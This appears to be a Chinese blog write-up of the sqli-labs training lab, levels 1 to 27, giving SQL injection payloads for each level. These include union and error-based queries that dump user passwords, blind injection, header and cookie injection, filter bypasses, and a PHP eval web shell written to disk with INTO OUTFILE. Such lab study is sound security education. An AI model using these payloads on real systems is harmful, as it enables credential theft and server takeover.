教程参考:

https://blog.csdn.net/he_and/article/details/79979616

[https://blog.csdn.net/qq_41420747/article/details/81836327##Less-1%20GET%20-%20Error%20based%20-%20Single%20quotes%20-%20String(%E5%9F%BA%E4%BA%8E%E9%94%99%E8%AF%AF%E7%9A%84GET%E5%8D%95%E5%BC%95%E5%8F%B7%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5)](https://blog.csdn.net/qq_41420747/article/details/81836327##Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入))

[TOC]

Page-1 Basic Challenges

Less-1 GET - Error Based -Single quotes - String 基于错误的GET单引号字符型注入

初步判断

要求输入id，在网址上加入?id=1

有反应

再加单引号，报错，存在注入

实施攻击

单引号可以被解析，通过闭合id参数，插入自己构造的sql语句实施攻击

?id=1' order by 1 ##

报错，将##改为编码%23

?id=1' order by 1 %23

成功显示，尝试，4的时候报错

说明db只有三个字段

当查询结果为多个时只返回第一个，所以使用union查询且使原结果为空

?id=-1' union select 1,2,3 %23

发现2，3被显示在了页面上

获取当前数据库版本，数据库路径，当前用户，当前数据库

?id=-1' union select 1,concat_ws('_',user(),version(),database()),@@basedir %23

拿到信息

表名

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

payload

http://localhost/sqli-labs-master/Less-1/?id=1%27%20and%20extractvalue(1,concat(0x7e,(select%20group_concat(username,0x3a,password)%20from%20users)))--+

Less-2 Error Based - Intiger 基于错误的GET整型注入

同Less-1，单引号报错

?id=1' order by 1

报错，判断是数值型注入

去掉单引号，其余同Less-1

Less-3 - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

源码

输入

?id=1' %23

回显失败

?id=1') %23

成功回显

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

?id=1'

成功回显无报错

将单引号改成双引号

?id=1"

报错,显示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

仔细观察，是双引号+括号where id=(”1”)\

?id=1") %23

正常回显

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

使用一种的方法发现可以注入，但是页面不能返回我们想要的全部信息

可以采用类似时间盲注的方法（因为页面还是能返回一点点东西）

数据库名长度(可以采用二分法)

?id=1' and if(length(database())=8,sleep(5),1)--+

有明显延迟，长度为8

爆破库名

id=1' and if(left(database(),1)='s',sleep(5),1)--+

left是提取最左边

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

?id=1"

返回错误信息

说明是双引号的注入

其余同五

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

源码：

使用文件导出

使用前面的Less查到的路径

Less-2/?id=-1 union select 1,@@basedir,@@datadir --+

?id=1')) union select 1,2,"<?php @eval($_POST['sql']);?>" into outfile '路径'%23

?id=1')) union select 1,2,'<?php @eval($_POST['sql']);?>' into outfile "D:\\phpStudy\\PHPTutorial\\WWW\\sqli-labs-master\\1.php"--+

注意必须要使用\\

==我没有导出文件来==

导出来，导出来之后用菜刀或者蚁剑连接

?id='

不回显

id=1

回显

id=1'

不回显

id=1' and 1=1 %23

回显

id=1' and 1=2 %23

不回显

是布尔型注入

爆破方法

?id=1' and left(database(),1)='s'%23

不管输入什么页面都显示一样->时间盲注

?id=1' and sleep(3) %23

明显延迟

爆破方式参看less-5

把9中的单引号改成双引号

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

username：' or 1=1 ##
password: a

Your Login name:Dumb
Your Password:Dumb

使用Dumb登录，成功

使用hackbar

uname=admin' order by 2## &passwd=admin&submit=Submit

Your Login name:admin
Your Password:admin

使用union查询

注意，uname是错的，才能显示出union后的内容

uname=a' union select 1,database() ## &passwd=admin&submit=Submit

Your Login name:1
Your Password:security

数据库名security

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

输入‘，无反应，输入"

have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""") and password


看下源码

![img](sqli-labs.assets/20180822112455820.png)

发现还有个括号，构造闭合语句

uname=1”) or 1=1## &passwd=1


成功返回



## Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)



还是那个输入框，输入```'```,

```You have an error in your SQL syntax; check the manual that corresponds to  your MySQL server version for the right syntax to use near '''') and  password=('') LIMIT 0,1' at line 1

发现是通过('')闭合的

输入

1') or 1=1 ## uname=1') or 1=1## &passwd=1

成功登录，但是没有回显信息

可以通过or语句判断输入信息是否正确（1=1处）

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

输入双引号

报错

have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '""" and password


注释符不可用

使双引号闭合

uname: “ or 1=1 or “
passwd: 1


登录成功

uname=” or 1=2 or “ &passwd=admin&submit=Submit


登录失败，说明可以在1=2处构造

###### extractvalue(目标xml文档，xml路径)

对XML文档进行查询的函数

```sql
uname=admin" and extractvalue(1,concat(0x7e,(select database()))) and "  &passwd=admin&submit=Submit

syntax error: '~security'```


```sql
uname=admin" and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and "  &passwd=admin&submit=Submit

syntax error: '~5.5.53~'```




## less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

没有回显

‘ or 1=1 or ‘1’=’2


登录成功

‘ or 1=(if(substr(version(),1,1)=5,1,0)) or ‘1’=’2




## Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

上输入什么都没有反应

“) or 1=1 or “1”=(“2

admin”)##


均登录成功

可以使用延迟注入

## Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

页面提示：password reset

![image-20200814133539931](sqli-labs.assets/image-20200814133539931.png)

>一下转载自：https://www.jianshu.com/p/ee6446e7f93c
>
>查看源码发现对`user name`表单进行了过滤：
>
>
>
>```php
>// take the variables
>if(isset($_POST['uname']) && isset($_POST['passwd']))
>{
>//making sure uname is not injectable
>$uname=check_input($_POST['uname']);  
>$passwd=$_POST['passwd'];
>

>function check_input($value)
   {
   if(!empty($value))
       {
       // truncation (see comments)
       $value = substr($value,0,15);
       }
       // Stripslashes if magic quotes enabled
       if (get_magic_quotes_gpc())
           {
           $value = stripslashes($value);
           }
       // Quote if not a number
       if (!ctype_digit($value))
           {
           $value = "'" . mysql_real_escape_string($value) . "'";
           }
           else
       {
       $value = intval($value);
       }
   return $value;
函数check_input（）的作用就是检查用户输入，并将用户输入安全化，其中的mysql_real_escape_string()会在\x00, \n, \r, \, ', " and \x1a这些字符前加入反斜线进行转义，防止注入，而且这个函数也避免了宽字节注入的危险。

3.当然，还不止，new password也不是和之前一样轻易试出注入类型，因为有user name的限制，如果new password不对，那么怎么试都自然是错的。因为看了大佬的解题思路，知道了为单引号闭合，SQL语句为：@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1"; $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";且知道有用户名为admin(这个用户名一般都有)。所以就直接考虑构造了。

4.首先考虑到不能回显有意义的信息，所以首选前面一直用的双注入查询构造如下：user name:填admin ,而new password:填' and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor(rand()*2)) as x from information_schema.tables group by x) as a)##

剩下的构造不多说，和Less-13一样，一个一个爆就好。
5.在这里，尝试使用一种新的注入方法，基于extractvalue()和updatexml()的报错注入，详情请看: 学习基于extractvalue()和updatexml()的报错注入，同时，下面的注入丢默认user name:填admin
6.先使用updatexml()进行注入，构造为' and updatexml(1,concat('~',(select version())),1)## 获取相应版本:

获取数据库名称：' and updatexml(1,concat('~',(select database())),1)##

获取表名：' and updatexml(1,concat('~',(select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),1)##

改变limit n,1即可获取其他表名。

获取列名：' and updatexml(1,concat('~',(select concat(column_name,';') from information_schema.columns where table_name='emails' limit 0,1)),1)##

同样，改变limit n,1即可。

获取内容：这样，不行' and updatexml(1,concat('~',(select concat(username,';',password) from information_schema.tables where table_name='security' limit 0,1)),1)## 报错如下：

这样：也不行' and updatexml(1,concat('~',(select concat(username,';',password) from security.users limit 0,1)),1)## 报错如下：

这样：发现可以了，但是password成了0，一下子把所有的用户密码都改成了0，后面的可能就有问题了。' or (select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)##

7.使用extractvalue()，和updatexml()十分相似，用法也差不多，甚至看起来跟直观些。构造：' and extractvalue(1,concat('~',(select version())))##

剩下的语句和updatexml()的类似。

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

源码：

if(isset($_POST['uname']) && isset($_POST['passwd']))

    {
    $uname = check_input($_POST['uname']);
    $passwd = check_input($_POST['passwd']);

$sql="SELECT  users.username, users.password FROM users 	WHERE users.username=$uname and users.password=$passwd
ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
    if($row1)
        {
        echo '<font color= "##FFFF00" font size = 3 >';
        $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
        mysql_query($insert);
        //echo 'Your IP ADDRESS is: ' .$IP;
        echo "</font>";
        //echo "<br>";
        echo '<font color= "##0000ff" font size = 3 >';          
        echo 'Your User Agent is: ' .$uagent;
        echo "</font>";
        echo "<br>";
        print_r(mysql_error());         
        echo "<br><br>";
        echo '<img src="../images/flag.jpg"  />';
        echo "<br>";
        
        }
    else
        {
        echo '<font color= "##0000ff" font size="3">';
        //echo "Try again looser";
        print_r(mysql_error());
        echo "</br>";           
        echo "</br>";
        echo '<img src="../images/slap.jpg"   />';  
        echo "</font>";  
        }

在插入语句$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";前没有进行过滤

从uagent下手，用burpsuite抓包

4.易知，只要保证User-Agent:字段内容，即uagent保持单引号闭合，且使用双查询注入或使用extractvalue()或updatexml()构造相应语句即可（因为是在插入语句中，只能通过报错获取我们想要的信息）。

5.构造语句查询数据库名：
构造一：' and updatexml(1,concat('~',(select database())),1) and '1'='1

构造二：' and extractvalue(1,concat('~',(select database()))) and '1'='1

构造三：' and (select 1 from (select count(*),concat(database(),';',floor(rand()*2)) as x from information_schema.tables group by x)as a) and '1'='1

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

回显返回referer

php文件：

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
	
function check_input($value)
	{
	if(!empty($value))
		{
		// truncation (see comments)
		$value = substr($value,0,20);
		}

		// Stripslashes if magic quotes enabled
		if (get_magic_quotes_gpc())
			{
			$value = stripslashes($value);
			}

		// Quote if not a number
		if (!ctype_digit($value))
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
		
	else
		{
		$value = intval($value);
		}
	return $value;
	}

	$uagent = $_SERVER['HTTP_REFERER'];
	$IP = $_SERVER['REMOTE_ADDR'];
	echo "<br>";
	echo 'Your IP ADDRESS is: ' .$IP;
	echo "<br>";
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))

	{
	$uname = check_input($_POST['uname']);
	$passwd = check_input($_POST['passwd']);
	

	//logging the connection parameters to a file for analysis.	
	$fp=fopen('result.txt','a');
	fwrite($fp,'Referer:'.$uname."\n");
	
	fclose($fp);
	
	
	
	$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "##FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "##0000ff" font size = 3 >';			
			echo 'Your Referer is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg" />';
			echo "<br>";			
			}
		else
			{
			echo '<font color= "##0000ff" font size="3">';
			//echo "Try again looser";
			print_r(mysql_error());
			echo "</br>";			
			echo "</br>";
			echo '<img src="../images/slap.jpg"  />';	
			echo "</font>";  
			}
	}
?>

使用burpsuite将referer改成

Referer:'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '

或者在referer后面加*，使用sqlmap

输入admin、admin

<?php
//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");
	error_reporting(0);
if(!isset($_COOKIE['uname']))
	{
	//including the Mysql connect parameters.
	include("../sql-connections/sql-connect.php");

	echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome&nbsp;&nbsp;&nbsp;<font color='#FF0000'> Dhakkan </font><br></div>";
	echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";
	echo "<div style='padding-top:10px; font-size:15px;'>";
 

	echo "<!--Form to post the contents -->";
	echo '<form action=" " name="form1" method="post">';

	echo ' <div style="margin-top:15px; height:30px;">Username : &nbsp;&nbsp;&nbsp;';
	echo '   <input type="text"  name="uname" value=""/>  </div>';
  
	echo ' <div> Password : &nbsp; &nbsp; &nbsp;';
	echo '   <input type="text" name="passwd" value=""/></div></br>';	
	echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';

	echo '</form>';
	echo '</div>';
	echo '</div>';
	echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';
	echo '<font size="3" color="#FFFF00">';
	echo '<center><br><br><br>';
	echo '<img src="../images/Less-20.jpg" />';
	echo '</center>';




	
function check_input($value)
	{
	if(!empty($value))
		{
		$value = substr($value,0,20); // truncation (see comments)
		}
		if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled
			{
			$value = stripslashes($value);
			}
		if (!ctype_digit($value))   	// Quote if not a number
			{
			$value = "'" . mysql_real_escape_string($value) . "'";
			}
	else
		{
		$value = intval($value);
		}
	return $value;
	}


	
	echo "<br>";
	echo "<br>";
	
	if(isset($_POST['uname']) && isset($_POST['passwd']))
		{
	
		$uname = check_input($_POST['uname']);
		$passwd = check_input($_POST['passwd']);
		
	

		
		$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
		$result1 = mysql_query($sql);
		$row1 = mysql_fetch_array($result1);
		$cookee = $row1['username'];
			if($row1)
				{
				echo '<font color= "#FFFF00" font size = 3 >';
				setcookie('uname', $cookee, time()+3600);	
				header ('Location: index.php');
				echo "I LOVE YOU COOKIES";
				echo "</font>";
				echo '<font color= "#0000ff" font size = 3 >';			
				//echo 'Your Cookie is: ' .$cookee;
				echo "</font>";
				echo "<br>";
				print_r(mysql_error());			
				echo "<br><br>";
				echo '<img src="../images/flag.jpg" />';
				echo "<br>";
				}
			else
				{
				echo '<font color= "#0000ff" font size="3">';
				//echo "Try again looser";
				print_r(mysql_error());
				echo "</br>";			
				echo "</br>";
				echo '<img src="../images/slap.jpg" />';	
				echo "</font>";  
				}
			}
		
			echo "</font>";  
	echo '</font>';
	echo '</div>';

}
else
{



	if(!isset($_POST['submit']))
		{
			
			$cookee = $_COOKIE['uname'];
			$format = 'D d M Y - H:i:s';
			$timestamp = time() + 3600;
			echo "<center>";
			echo '<br><br><br>';
			echo '<img src="../images/Less-20.jpg" />';
			echo "<br><br><b>";
			echo '<br><font color= "red" font size="4">';	
			echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];
			echo "</font><br>";	
			echo '<font color= "cyan" font size="4">';	
			echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];			
			echo "</font><br>";			
			echo '<font color= "#FFFF00" font size = 4 >';
			echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";
			echo '<font color= "orange" font size = 5 >';			
			echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);
			
			
			echo "<br></font>";
			$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
			$result=mysql_query($sql);
			if (!$result)
  				{
  				die('Issue with your mysql: ' . mysql_error());
  				}
			$row = mysql_fetch_array($result);
			if($row)
				{
			  	echo '<font color= "pink" font size="5">';	
			  	echo 'Your Login name:'. $row['username'];
			  	echo "<br>";
				echo '<font color= "grey" font size="5">';  	
				echo 'Your Password:' .$row['password'];
			  	echo "</font></b>";
				echo "<br>";
				echo 'Your ID:' .$row['id'];
			  	}
			else	
				{
				echo "<center>";
				echo '<br><br><br>';
				echo '<img src="../images/slap1.jpg" />';
				echo "<br><br><b>";
				//echo '<img src="../images/Less-20.jpg" />';
				}
			echo '<center>';
			echo '<form action="" method="post">';
			echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';
			echo '</form>';
			echo '</center>';
		}	
	else
		{
		echo '<center>';
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo "<br>";
		echo '<font color= "#FFFF00" font size = 6 >';
		echo " Your Cookie is deleted";
				setcookie('uname', $row1['username'], time()-3600);
				header ('Location: index.php');
		echo '</font></center></br>';
		
		}		


			echo "<br>";
			echo "<br>";
			//header ('Location: main.php');
			echo "<br>";
			echo "<br>";
			
			//echo '<img src="../images/slap.jpg" /></center>';
			//logging the connection parameters to a file for analysis.	
		$fp=fopen('result.txt','a');
		fwrite($fp,'Cookie:'.$cookee."\n");
	
		fclose($fp);
	
}
?>

查询语句中使用了cookee，尝试在cookies里面进行注入，抓包

看到cookie：uname=admin，确定是cookie注入

在admin后加’，报错，

Cookie: uname=admin' order by 3--+ //1-3 正常
Cookie: uname=admin' order by 4--+ //4 不正常 ，确定行数为3

Cookie: uname=-admin' union select 1,2,database()--+

uname值base64加密，其余与上一个题相同

上传加密语句

admin' and 1=1 --+    //明文
YWRtaW4nIGFuZCAxPTEgLS0r    //密文

-admin') union select 1,2,database()#
LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==

双引号，其余与上一题相同

-admin" union select 1,2,database()#
LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkj

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

没有输入框，考虑get型注入

id='

报错

?id=' union select 1,2,database() '
?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() or '1'= '
?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' or '1'= '
?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

注册用户 admin’#

登录后修改密码，语句成为

users SET passwd


然后用修改过的密码登录admin账号



## **Less-25** Trick with OR & AND (过滤了or和and)

![image-20200829115431073](sqli-labs.assets/image-20200829115431073.png)

过滤了or和and

输入

```?id=1


报错

![image-20200829115610277](sqli-labs.assets/image-20200829115610277.png)

```?id=1'%23

成功，可以注入

使用union查询

?id=-1' union select 1,2,database()--+

注意犹豫过滤了or，将password改成passwoorrd

?id=-1' union select 1,2,group_concat(username,0x7e,passwoorrd) from users--+

双写or和and

?id=0' oorr 1=1 --+
?id=2' aandnd 1=1 --+

成功

Less-26(failed) Trick with comments and space (过滤了注释和空格的注入)

借鉴：https://www.jianshu.com/p/ff72f2c6d99c

源码

$id = blacklist($id);
$hint =$id;
function blacklist($id)
{
    $id = preg_replace('/or/i',"",$id);             //strip out OR (non case sensitive)
    $id = preg_replace('/and/i',"",$id);            //Strip out AND (non case sensitive)
    $id = preg_replace('/[\/\*]/',"",$id);          //strip out /*
    $id = preg_replace('/[--]/',"",$id);            //Strip out --
    $id = preg_replace('/[#]/',"",$id);             //Strip out #
    $id = preg_replace('/[\s]/',"",$id);            //Strip out spaces
    $id = preg_replace('/[\/\\\\]/',"",$id);        //Strip out slashes
    return $id;
}

不仅过滤了上一关的or与and，还过滤了单行注释--与#(含URL编码)以及多行注释/**/（被解释为空格，常用于过滤空格时），还过滤了(空格)，以及正反斜杠/与\。

使用%a0绕过，没有成功

updatexml注入

?id=0'||updatexml(1,concat('$',(database())),0)||'1'='1

?id=0'||updatexml(1,concat('$',(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),0)||'1'='1

less 27 GET - Error Based- All your UNION & SELECT belong to us （过滤了union和select的）

没有过滤大写的关键字

把or换成&&（%26%26）

题解里面写的用%a0绕过空格过滤，我这里没有成功

双引号型

?id=1"and(length(database())>7)%a0uNion%a0sELect%a01,2,"3

同样，%a0过滤不成功

Author: Michelle19l

Link: https://gitee.com/michelle19l/michelle19l/2020/08/29/sqli/sqli-labs/

Donate

微信
支付寶

Page-1 Basic Challenges

Less-1 GET - Error Based -Single quotes - String 基于错误的GET单引号字符型注入

初步判断

实施攻击

Less-2 Error Based - Intiger 基于错误的GET整型注入

Less-3 - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

使用union查询

双写or和and

Less-26(failed) Trick with comments and space (过滤了注释和空格的注入)

updatexml注入

less 27 GET - Error Based- All your UNION & SELECT belong to us （过滤了union和select的）

less 27a GET - Blind Based- All your UNION & SELECT belong to us

Page-1 Basic Challenges

Less-1 GET - Error Based -Single quotes - String 基于错误的GET单引号字符型注入

初步判断

实施攻击

Less-2 Error Based - Intiger 基于错误的GET整型注入

Less-3 - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

Less-4 GET - Error based - Double Quotes - String （基于错误的GET双引号字符型注入）

Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

Less-7 GET - Dump into outfile - String （导出文件GET字符型注入）

Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入)

Less-22 Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)

Less-23 GET - Error based - strip comments (基于错误的，过滤注释的GET型)

Less - 24 Second Degree Injections Real treat -Store Injections (二次注入)

使用union查询

双写or和and

Less-26(failed) Trick with comments and space (过滤了注释和空格的注入)

updatexml注入

less 27 GET - Error Based- All your UNION & SELECT belong to us （过滤了union和select的）

less 27a GET - Blind Based- All your UNION & SELECT belong to us